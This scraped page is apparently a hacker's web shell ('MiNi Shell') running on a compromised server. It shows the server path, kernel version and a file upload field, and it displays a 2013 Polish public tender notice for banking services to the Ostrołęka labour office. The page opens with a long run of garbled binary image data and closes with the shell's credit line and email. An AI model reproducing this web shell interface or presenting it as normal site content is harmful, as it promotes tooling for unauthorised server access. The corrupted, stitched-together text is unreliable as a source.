JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130415/147686-N-2013.html

<p class="kh_header"><b>Ostrołęka: Kompleksowa obsługa bankowa Funduszu Pracy dla potrzeb Powiatowego Urzędu Pracy w Ostrołęce</b><br>
<b>Numer ogłoszenia: 147686 - 2013; data zamieszczenia: 15.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. 11 Listopada 68, 07-400 Ostrołęka, woj. mazowieckie, tel. 029 7603377, 7604383, faks 029 7603377, 7604383 wew. 203.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-ostroleka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa obsługa bankowa Funduszu Pracy dla potrzeb Powiatowego Urzędu Pracy w Ostrołęce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest ,, Kompleksowa obsługa bankowa Funduszu Pracy dla potrzeb Powiatowego Urzędu Pracy w Ostrołęce polegająca w szczególności na otwarciu i prowadzeniu rachunku bieżącego i rachunków pomocniczych  w tym obsługa projektów z udziałem środków Europejskiego Funduszu Społecznego Funduszu Pracy, a także wypłat gotówkowych i bezgotówkowych dla uprawnionych klientów i kontrahentów Powiatowego Urzędu Pracy w Ostrołęce. Wypłaty dokonywane będą na zlecenie Powiatowego Urzędu Pracy w Ostrołęce.

Zakres obsługi będzie obejmował:

Otwarcie i prowadzenie bieżącego rachunku bankowego Funduszu Pracy.
Otwarcie i prowadzenie rachunków bankowych pomocniczych w zależności od potrzeb.
Wykonawca otwiera bądź zamyka rachunki zgodnie z poleceniem Zamawiającego.
Realizację poleceń przelewów na rachunki prowadzone w banku obsługującym. 
Realizację poleceń przelewów na rachunki w innych bankach. 
Obciążenia jak i uznania rachunków Zamawiającego odbywać się będzie w dniu operacji.
Potwierdzanie stanu sald rachunków na każdy dzień roboczy poniedziałek  piątek   w wersji wyciągów otrzymywanych drogą elektroniczną.
Podawanie w wyciągach bankowych pełnych informacji o źródle płatności, rodzaju płatności, dacie obciążenia rachunku w innym banku lub dacie dokonania płatności gotówkowej dłużnika w innym banku.
Obsługa wypłat bezgotówkowych odbywać się będzie przy pomocy systemu elektronicznego udostępnionego przez Wykonawcę.
Wykonawca udostępni system elektroniczny współpracujący z funkcjonującym programem w Powiatowym Urzędzie Pracy w Ostrołęce oraz dokona zainstalowania systemu oraz zapewni użytkowanie na co najmniej 4 stanowiskach pracy programu do obsługi bankowości elektronicznej do obowiązków wyłonionego Wykonawcy należeć będzie również  przeszkolenie pracowników Zamawiającego w zakresie obsługi programu. Ponadto powinien dostarczyć  wszelkie dodatkowe niezbędne do pracy w systemie akcesoria zarówno dla osób sporządzających dokumenty w systemie bankowości elektronicznej, jak i dla podpisujących w ilości wymaganej przez Zamawiającego. W ramach elektronicznej obsługi bankowej posiadacz rachunku będzie miał zapewnione w szczególności: 

dostępność systemu bankowości elektronicznej poprzez sieć WAN,
dostęp z aplikacji zainstalowanej u Zamawiającego,
bezpieczeństwo poprzez uwierzytelnianie za pomocą certyfikatu użytkownika 
i klucza prywatnego,
rejestracja aktywności poprzez zapisywanie wszelkich aktywności użytkownika oraz operacji jakie były wykonywane, np. próby logowania do systemu, odczyt historii konta.
automatyczne wylogowywanie użytkownika z systemu, jeśli stwierdzono brak aktywności przez 10 minut.
uzyskiwanie na bieżąco wiadomości o wszystkich operacjach i saldach na rachunku bieżącym i rachunkach pomocniczych,
tworzenie zbiorów danych rachunków, kontrahentów i innych danych ewidencyjnych,
przeszukiwanie zbiorów wszystkich operacji na wszystkich rachunkach,
składanie poleceń przelewów, w tym poleceń przelewów do Zakładu Ubezpieczeń Społecznych i Urzędu Skarbowego, ze wszystkich rachunków w ramach dostępnych środków,
uzyskiwanie raportów o zrealizowanych operacjach, generowanie (wydruk) wyciągów nie wymagających stempla bankowego,
potwierdzenie zrealizowania przelewu w systemie online (po realizacji przelewu informacja w systemie bankowości elektronicznej),
informację o odrzuceniu transakcji z podaniem komunikatu o jej przyczynie,
przechowywanie wysyłanych przelewów w archiwum systemu co najmniej przez okres 3 miesięcy od daty dokonania operacji,
zapewnienie pomocy technicznej w okresie wdrożeniowym i po-wdrożeniowym, tj. przez cały czas trwania umowy polegającej na obsłudze autorskiej Banku 
w Powiatowym Urzędzie Pracy z czasem reakcji maksymalnie 2 godziny od zgłoszenia problemu telefonicznie, faksem lub pocztą elektroniczną.
Zamawiający zastrzega sobie prawo realizacji przelewów papierowych w sytuacjach losowych, np. awaria systemu.
Zlecenia papierowe winny być realizowane w dniu ich przekazania do banku, natomiast przelewy w formie elektronicznej przy pomocy systemu bankowości elektronicznej w czasie rzeczywistego zlecenia.
Wypłatę świadczeń pieniężnych dla bezrobotnych i innych uprawnionych osób określonych w ustawie z dnia 20.04.2004 r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity Dz. U. z 2008 r., nr 69 poz. 415 z późn. zm.)  w Ostrołęce.
Wypłata świadczeń gotówką dla osób bezrobotnych dokonywana będzie w miejscu wyznaczonym przez Wykonawcę na terenie miasta Ostrołęka w terminach uzgodnionych 
z Zamawiającym w godzinach od 900 do 1700.
Wypłaty gotówkowe świadczeń dokonywane będą wyłącznie na podstawie dostarczonych przez Zamawiającego imiennych poleceń wypłat dla osób uprawnionych do świadczeń, zatwierdzonych przez osoby uprawnione - zgodnie z kartą wzoru podpisów. W poleceniach wypłat będzie wyszczególnione dane osoby uprawnionej do wypłaty, takie jak: imię 
i nazwisko, adres zamieszkania i nr PESEL.
Listy te dostarczane będą przez Zamawiającego co najmniej 1 dzień wcześniej przed ustalonym terminem wypłat.
Wykonawca dokona wypłat uprawnionej osobie na podstawie dowodu osobistego lub innego dokumentu tożsamości ze zdjęciem (paszport, prawo jazdy).
Przewiduje się ustalenie 1 terminu wypłaty w okresie do 14 dnia kalendarzowego każdego miesiąca.
Wymagana liczba dni wypłat w miesiącu: dwa kolejne dni robocze. 
Wykonawca dokonuje wypłat świadczeń z rachunku wskazanego przez Zamawiającego. Obciążenie rachunku nastąpi zgodnie z dokonanymi wypłatami 
w danym dniu. Wykonawca sporządzi zestawienie wypłat gotówkowych w danym dniu, do którego załączy jeden egzemplarz polecenia wypłaty.
Zamawiający dokona odbioru dokumentów poświadczających dokonanie wypłat gotówkowych po dokonaniu wypłaty przez Wykonawcę lub po upływie okresu wypłat.
Zaświadczone usługi w zakresie wypłat gotówkowych uprawnionym osobom na podstawie imiennych list Wykonawca może pobierać prowizję. Maksymalna prowizja od dokonywanych wypłat nie może przekroczyć 0,8% wypłaconej kwoty, zgodnie 
z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 7 października 2011 r. 
w sprawie szczegółowych zasad gospodarki finansowej Funduszu Pracy (Dz. U. z 2011 r. nr 221, poz. 1317).
Ustalona prowizja w okresie obowiązywania umowy nie może ulec zmianie.
Zamawiający zastrzega sobie prawo pobierania czeków gotówkowych.
Realizacja czeków gotówkowych w banku obsługującego. 
Wykonawca zobowiązuje się do przyjmowania wpłat gotówkowych od Zamawiającego.
Środki na rachunkach podlegają kapitalizacji każdego dnia. Odsetki te będą dopisywane na koniec każdego miesiąca kalendarzowego.
Oprocentowanie środków na wszystkich rachunkach bankowych. Wysokość oprocentowania będzie ustalona wg WIBID 1M pierwszego dnia roboczego rozpoczynającego okres obrachunkowy plus minus marża Banku określona w ofercie składanej przez Bank. Marża Banku jest stała w całym okresie trwania umowy.
Bank nie będzie pobierał od Powiatowego Urzędu Pracy w Ostrołęce innych niż zaproponowane w ofercie opłat, prowizji za wykonywanie czynności wymienionych 
w zamówieniu.
Wykonawca zobowiązuje się do wyznaczenia osoby (opiekuna) do bieżących kontaktów z Zamawiającym.
Przewidywany obrót na rachunkach może wynieść około 27 000 000,00 PLN. W 2012 r. obrót na tych rachunkach wyniósł 22 700 000,00 PLN
Średniomiesięczna wysokość środków na rachunkach bankowych w 2012 r. wyniosła 3 555 743,00 PLN.
Średnia miesięczna liczba osób, którym świadczenia będą wypłacane gotówką - w kasie banku może wachać się w przedziale od 5 do 10 osób.
Średniomiesięczną wysokość wypłat gotówkowych szacuje się na kwotę 10 000,00 PLN.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że posiada uprawnienia do wykonywania czynności bankowych zgodnie z przepisami ustawy z 29 sierpnia 1997 r. - Prawo bankowe (Dz.U. z 2012, poz. 1376 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający ocenę spełnienia w/w warunku dokona metodą spełnia/nie spełnia w oparciu o oświadczenie (zgodnie z art. 22 ust. 1 ustawy Pzp) dołączone do oferty, którego wzór stanowi załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający ocenę spełnienia w/w warunku dokona metodą spełnia/nie spełnia w oparciu o oświadczenie (zgodnie z art. 22 ust. 1 ustawy Pzp) dołączone do oferty, którego wzór stanowi załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający ocenę spełnienia w/w warunku dokona metodą spełnia/nie spełnia w oparciu o oświadczenie (zgodnie z art. 22 ust. 1 ustawy Pzp) dołączone do oferty, którego wzór stanowi załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający ocenę spełnienia w/w warunku dokona metodą spełnia/nie spełnia w oparciu o oświadczenie (zgodnie z art. 22 ust. 1 ustawy Pzp) dołączone do oferty, którego wzór stanowi załącznik nr 3 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany formularz oferty - zgodny z treścią załącznika nr 1 do SIWZ. 
Upoważnienie do podpisania oferty w imieniu Wykonawcy zgodnie z wpisem o reprezentacji  zawartym w stosownym dokumencie uprawniającym do występowania w obrocie prawnym lub  udzielonym pełnomocnictwie. Pełnomocnictwo winno być dołączone do oferty, o ile nie wynika 
z  innych dokumentów załączonych przez Wykonawcę.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego, zgodnie z pozycją  9.2.2. w SIWZ.
Parafowany przez Wykonawcę projekt umowy - na formularzu zgodnym z treścią  załącznika  nr  2 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Oprocentowanie środków pienięznych na rachunku bieżącym i pomocniczych - 30</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-ostroleka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Ostrołęce
ul. 11 Listopada 68
07-410 Ostrołęka
pokój nr 29 II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2013 godzina 09:30, miejsce: Powiatowy Urząd Pracy w Ostrołęce
ul. 11 Listopada 68
07-410 Ostrołęka pokój nr 20 (kancelaria) I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com